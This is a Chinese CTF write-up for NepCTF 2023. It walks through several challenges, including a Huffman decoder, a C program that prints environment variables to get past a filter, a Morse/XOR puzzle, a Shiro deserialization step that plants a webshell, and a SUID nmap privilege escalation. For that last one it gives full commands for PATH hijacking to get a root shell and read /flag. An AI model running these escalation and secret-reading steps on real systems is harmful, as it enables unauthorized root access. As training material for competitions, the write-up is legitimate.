CheckIn

签到,直接出

1

与AI共舞的哈夫曼

打开发现是哈夫曼编码,提示ai,直接用ai生成即可

import heapq
import os

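class HuffmanNode:
    """One node of a Huffman tree.

    Leaves carry a symbol in ``char``; nodes created with ``char=None``
    act as internal nodes and reach their children through ``left`` and
    ``right``.
    """

    def __init__(self, char, freq):
        self.char = char    # symbol for a leaf, None for an internal node
        self.freq = freq    # weight used to order nodes in the heap
        self.left = None
        self.right = None

    def __lt__(self, other):
        # heapq compares nodes through this method, so ordering is by
        # frequency only. Equal frequencies are not broken by symbol, which
        # means an encoder and a decoder only agree on the codes when both
        # build the tree from the same table in the same insertion order.
        return self.freq < other.freq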

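def build_huffman_tree(frequencies):
    """Build a Huffman tree from a ``{symbol: count}`` mapping.

    Nodes are created in the mapping's iteration order and merged two at a
    time, lowest frequency first, until one root remains.

    Returns:
        The root ``HuffmanNode``, or ``None`` when ``frequencies`` is empty
        (previously an empty table failed with IndexError on ``heap[0]``).
    """
    heap = [HuffmanNode(char, freq) for char, freq in frequencies.items()]
    if not heap:
        # Nothing to encode: an empty table has no tree.
        return None
    heapq.heapify(heap)

    while len(heap) > 1:
        # The first node popped becomes the left ("0") child, the second
        # the right ("1") child. Do not reorder: the codes depend on it.
        left = heapq.heappop(heap)
        right = heapq.heappop(heap)
        merged = HuffmanNode(None, left.freq + right.freq)
        merged.left = left
        merged.right = right
        heapq.heappush(heap, merged)

    return heap[0]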

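def build_huffman_codes(node, current_code, huffman_codes):
    """Fill ``huffman_codes`` with the bit string of every leaf under ``node``.

    Args:
        node: subtree root; ``None`` is accepted and ignored.
        current_code: bit string accumulated on the way down to ``node``.
        huffman_codes: dict updated in place as ``{symbol: bit string}``.

    A left edge appends '0' and a right edge appends '1'. When ``node`` is
    itself a leaf on the first call, its symbol is assigned the empty
    string passed in as ``current_code``.
    """
    if node is None:
        return

    if node.char is not None:
        # Leaf: the path walked so far is this symbol's code.
        huffman_codes[node.char] = current_code
        return

    build_huffman_codes(node.left, current_code + '0', huffman_codes)
    build_huffman_codes(node.right, current_code + '1', huffman_codes)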

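def compress(input_file, output_file):
    """Huffman-compress ``input_file`` into ``output_file``.

    Output layout: one byte with the number of table entries, then per
    entry one symbol byte followed by its count as 4 big-endian bytes, then
    the bit stream packed most significant bit first.

    The stream is padded with 1 to 8 zero bits (8 when it is already
    byte-aligned) and the padding length is not stored, so a decoder has to
    use the counts in the table to know where the data ends.

    Raises:
        ValueError: if the input uses all 256 byte values (the entry count
            does not fit in one byte) or a symbol occurs more often than a
            4-byte count can hold.
    """
    with open(input_file, 'rb') as f:
        data = f.read()

    # Plain dict on purpose: the first-occurrence order of the symbols is
    # the order written to the header and fed to the tree builder.
    frequencies = {}
    for byte in data:
        frequencies[byte] = frequencies.get(byte, 0) + 1

    # Validate before the output file is opened, so a rejected input does
    # not leave a truncated output behind.
    if len(frequencies) > 0xFF:
        raise ValueError('input uses all 256 byte values; the one-byte entry count cannot represent that')
    if any(freq > 0xFFFFFFFF for freq in frequencies.values()):
        raise ValueError('a symbol count does not fit in the 4-byte field')

    root = build_huffman_tree(frequencies) if frequencies else None
    huffman_codes = {}
    build_huffman_codes(root, '', huffman_codes)

    # join() instead of repeated += keeps this linear in the input size.
    compressed_data = ''.join(huffman_codes[byte] for byte in data)

    padding = 8 - len(compressed_data) % 8
    compressed_data += '0' * padding

    header = bytearray([len(frequencies)])
    for byte, freq in frequencies.items():
        header.append(byte)
        header += freq.to_bytes(4, 'big')

    # After padding the stream is a non-empty multiple of 8 bits; converting
    # it in one step keeps leading zero bits because the length is explicit.
    payload = int(compressed_data, 2).to_bytes(len(compressed_data) // 8, 'big')

    with open(output_file, 'wb') as f:
        # Write frequency information
        f.write(header)
        # Write compressed data
        f.write(payload)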

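def decompress(input_file, output_file):
    """Decode a Huffman-compressed file and write the recovered bytes.

    Layout read here: one byte with the number of table entries, then per
    entry one symbol byte followed by a 4-byte big-endian count, then the
    bit stream (most significant bit of each byte first).

    The input is parsed as untrusted data: a short header is reported as
    ValueError instead of surfacing as an IndexError/TypeError from the
    byte reads, and decoding stops once the number of symbols announced by
    the table has been produced, so trailing padding bits are not turned
    into spurious output bytes.

    Raises:
        ValueError: if the header is truncated, or the table describes a
            single symbol with a non-zero count.
    """
    with open(input_file, 'rb') as f:
        # Read frequency information
        count_byte = f.read(1)
        if not count_byte:
            raise ValueError('compressed file is empty: entry count missing')
        num_freqs = count_byte[0]

        frequencies = {}
        for _ in range(num_freqs):
            entry = f.read(5)
            if len(entry) != 5:
                raise ValueError('compressed file is truncated inside the frequency table')
            frequencies[entry[0]] = int.from_bytes(entry[1:], 'big')

        # Read compressed data
        compressed_data = f.read()

    # Build Huffman tree (same table, same order as it was written)
    root = build_huffman_tree(frequencies) if frequencies else None
    total_symbols = sum(frequencies.values())

    if root is not None and root.char is not None and total_symbols:
        # A lone leaf has an empty code, so the bit stream says nothing and
        # the output length would come from the header alone. Refuse rather
        # than let a few header bytes dictate gigabytes of output.
        raise ValueError('single-symbol table: stream cannot be decoded')

    # Decode compressed data using Huffman tree. The root is an internal
    # node here, so every symbol costs at least one bit and the output can
    # never exceed eight bytes per input byte.
    decoded_data = bytearray()
    if root is not None and root.char is None:
        current_node = root
        for byte in compressed_data:
            if len(decoded_data) >= total_symbols:
                break
            for shift in range(7, -1, -1):
                if (byte >> shift) & 1:
                    current_node = current_node.right
                else:
                    current_node = current_node.left

                if current_node.char is not None:
                    decoded_data.append(current_node.char)
                    current_node = root
                    if len(decoded_data) >= total_symbols:
                        # Everything after this point is padding.
                        break

    # Write decompressed data to output file
    with open(output_file, 'wb') as out_f:
        out_f.write(decoded_data)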

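if __name__ == "__main__":
    # Input is the challenge's compressed file; the decoded bytes are
    # written next to it.
    compressed_file = 'compressed.bin'
    decompressed_file = 'decompressed.txt'
    # Decompress the file
    decompress(compressed_file, decompressed_file)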

生成decompressed.txt,打开即可得到flag

image-20230813190438829

codes

提示flag在环境变量中

发现envsys等字符串被过滤了

使用main函数的第三个参数(envp),遍历环境变量即可

#include <stdio.h> 

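/*
 * Print every environment string handed to the process, one per line.
 *
 * The environment is read through the third parameter of main, a widely
 * supported extension, instead of through getenv()/environ.
 */
int main(int argc, char *argv[], char * e[])
{
    int i;

    (void)argc;
    (void)argv;

    for (i = 0; e[i] != NULL; i++)
        /* Environment values are data, never a format string: passing
         * them as printf's first argument would interpret any '%' they
         * contain. puts() prints them verbatim and adds the newline. */
        puts(e[i]);
    return 0;
}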

image-20230813190521001

陌生的语言

1

发现奇怪的语言,结合题目

直接谷歌图片搜索一下

QQ图片20230812150358

QQ图片20230812150348

得到

NEPNEPABELIEVINGHEARTISYOURMAGIC

NepCTF{NEPNEP_A_BELIEVING_HEART_IS_YOUR_MAGIC}

小叮弹钢琴

用Audacity打开音频

image-20230812150617939

猜测是摩斯编码

后面还有一排0x字符串

image-20230812150654631

根据摩斯解出来的提示,进行XOR

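# Hex bytes taken from the audio file and the key phrase given by the
# decoded Morse hint; both are space-separated, one entry per position.
encode = '37 0a 05 30 3c 29 0e 04 50 05 03 1c 2b 18 58 47 3a 5f 05 21 17 03 2c 39 23 0f 00 5d 1e 17'
key = 'y o u s h o u l d u s e t h i s t o x o r s o m e t h i n g'
lis = encode.split(' ')
key_lis = key.split(' ')

# A length mismatch would either raise IndexError or silently ignore part
# of the key, so check it up front.
if len(lis) != len(key_lis):
    raise ValueError('ciphertext and key must have the same number of entries')

# XOR each ciphertext byte with the key character at the same position.
flag = ''.join(
    chr(int(hex_byte, 16) ^ ord(key_char))
    for hex_byte, key_char in zip(lis, key_lis)
)
print(flag)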

image-20230813190621211

ez_java_checkin

image-20230812155841136

shiro框架的反序列化

爆破构造链,容器很容易就挂掉,手动试了一下就出来

写入内存马

image-20230812160333968

蚁剑连接一下,发现没有权限访问flag

在start.sh找到flag

image-20230812160444629

ConnectedFive

nc交互一下,玩着玩着分数够了就win

image-20230812181914847

独步天下-转生成为镜花水月中的王者

nc 连接一下

根据提示的环境变量提权

# List every regular file that has the setuid bit set (mode 4000).
# The same listing serves as a host audit: each entry runs with its
# owner's privileges and should be there on purpose.
find / -type f -perm -4000

搜索SUID文件

image-20230812222834639

发现了/bin目录下的nmap

image-20230812222927512

执行一下

image-20230812223020073

调用了系统指令ports-alive(从后面的利用可以看出,它是按PATH查找的,没有写绝对路径)

# Transcript of the privilege escalation described above. Root cause, per
# the write-up: the setuid /bin/nmap runs a helper called "ports-alive"
# and the lookup goes through the caller's PATH, so whoever controls PATH
# decides which file runs with the binary's privileges.
# Hardening: privileged programs should call helpers by absolute path and
# reset PATH / the environment before executing anything, and a wrapper
# like this should not carry the setuid bit at all.
cd /tmp    
# A file named like the helper, placed in a world-writable directory.
echo "/bin/sh" > ports-alive
# 777 is broader than needed; the lookup only requires the execute bit.
chmod 777 ports-alive
echo $PATH
# Put /tmp first so it is searched before the real helper's directory.
export PATH=/tmp:$PATH
cd /bin
# The setuid binary resolves ports-alive through the modified PATH.
./nmap 127.0.0.1
# Typed into the shell started by the previous command, not this script.
cat /flag

image-20230812223450714